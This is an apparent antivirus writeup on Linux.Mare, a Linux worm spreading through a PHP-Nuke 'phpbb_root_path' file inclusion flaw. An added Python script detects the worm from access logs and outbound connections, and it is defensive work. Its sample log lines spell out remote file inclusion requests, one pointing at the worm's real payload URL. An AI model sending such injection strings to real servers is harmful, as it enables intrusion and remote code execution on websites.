Discovered: December 24, 2005
Updated: December 24, 2005 11:11:17 AM
Systems Affected: Linux
Linux.Mare is a worm that spreads by exploiting the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm opens a back door and downloads and executes remote files on the compromised computer.
Once executed, the worm attempts to open a back door by connecting to the following servers:
81.223.104.152
24.224.174.18
The worm may receive the following commands from the remote attacker through the back door:
Update the worm
Execute files
Terminate the worm
The worm then downloads and executes the following executable file from the above servers:
listen
If the above file already exists on the compromised computer the worm will download the following file, which is an updated version of the program:
update.listen
The worm logs its activities to the following file:
listen.log
The worm attempts to exploit the PHP-Nuke "phpbb_root_path" Arbitrary File Inclusion vulnerability. If successful, the worm downloads and executes a file from the following location:
http://209.136.48.69/cvac
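The following script is an added example, not part of this writeup or of any Symantec tooling. It shows how an administrator could hunt for this worm from the server side: it scans web-server access logs for requests that tamper with the "phpbb_root_path" parameter (the injection point the worm uses; a browser never sends that parameter on its own) and checks a snapshot of outbound connections against the back-door servers and the dropped "listen" binary named above. The parameter name, the two server addresses, the payload URL and the file names come from the writeup; the Apache "combined" log format, the sample log lines, the attacker host 203.0.113.5, the PHP script path and the port numbers are constructed for the example.

```python
"""Added example (not Symantec's code): spot Linux.Mare-style activity from
web-server logs and outbound connections.

Indicators taken from the writeup: the phpbb_root_path parameter, the
back-door servers 81.223.104.152 and 24.224.174.18, the payload URL
http://209.136.48.69/cvac and the dropped executable names.
Everything else (log format, sample lines, attacker host 203.0.113.5,
script path, ports) is constructed for the example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PARAM = "phpbb_root_path"
BACKDOOR_SERVERS = {"81.223.104.152", "24.224.174.18"}
PAYLOAD_URL = "http://209.136.48.69/cvac"
DROPPED_NAMES = {"listen", "update.listen"}

# Apache "combined" access-log layout; an assumption about how the victim logs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)


def injected_include(target):
    """Return the value smuggled in through phpbb_root_path, or None.

    With register_globals on, the GET parameter overrides the PHP variable that
    is prepended to an include() filename. Attackers end their URL with '?' or
    '&' so the rest of the include path becomes a query string; that tail is
    stripped so the returned value is the bare URL.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in params.get(VULN_PARAM, []):
        value = unquote(raw).strip()  # second decode catches %25-style double encoding
        if value:
            return value.rstrip("?&")
    return None


def scan_access_log(lines):
    """Return one record per request that tampers with phpbb_root_path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = injected_include(m["target"])
        if value is None:
            continue
        hits.append({
            "src": m["src"],
            "ts": m["ts"],
            "include": value,
            "remote": bool(REMOTE_SCHEME.match(value)),
            # a 200 is a strong hint the include ran; 4xx/5xx usually means it did not
            "status": int(m["status"]),
            "known_payload": value.startswith(PAYLOAD_URL),
        })
    return hits


def worm_connections(connections):
    """From (process, dst_ip, dst_port) tuples (e.g. parsed from `ss -ntp`),
    return those that reach a back-door server or belong to the dropped binary."""
    return [c for c in connections
            if c[1] in BACKDOOR_SERVERS or c[0] in DROPPED_NAMES]


# Constructed sample log. The script path is a placeholder; the writeup does
# not name the vulnerable PHP-Nuke file.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2005:09:14:02 +0000] "GET /modules/Forums/admin/index.php'
    '?phpbb_root_path=http://203.0.113.5/c.txt? HTTP/1.0" 200 4123 "-" "-"',
    '198.51.100.7 - - [24/Dec/2005:09:14:09 +0000] "GET /modules.php?name=Forums'
    '&file=viewtopic&t=12 HTTP/1.1" 200 18822 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Dec/2005:09:15:31 +0000] "GET /modules/Forums/admin/index.php'
    '?phpbb_root_path=http%253A%252F%252F203.0.113.5%252Fc.txt%253F HTTP/1.0" 200 4123 "-" "-"',
    '203.0.113.5 - - [24/Dec/2005:09:16:44 +0000] "GET /modules/Forums/admin/index.php'
    '?phpbb_root_path=http://209.136.48.69/cvac? HTTP/1.0" 404 291 "-" "-"',
]

# Constructed snapshot of outbound connections; the ports are made up.
SAMPLE_CONNECTIONS = [
    ("listen", "81.223.104.152", 8080),
    ("sshd", "198.51.100.7", 22),
    ("httpd", "24.224.174.18", 80),
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("RFI attempt:", hit)
    for conn in worm_connections(SAMPLE_CONNECTIONS):
        print("back-door traffic:", conn)
```

Run it against real logs by feeding `open("/var/log/httpd/access_log")` to scan_access_log; a hit with status 200 and "remote" set means the server fetched attacker-controlled PHP, and the host should then be checked for the listen, update.listen and listen.log files and for processes talking to the two servers above.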
Writeup By: Kaoru Hayashi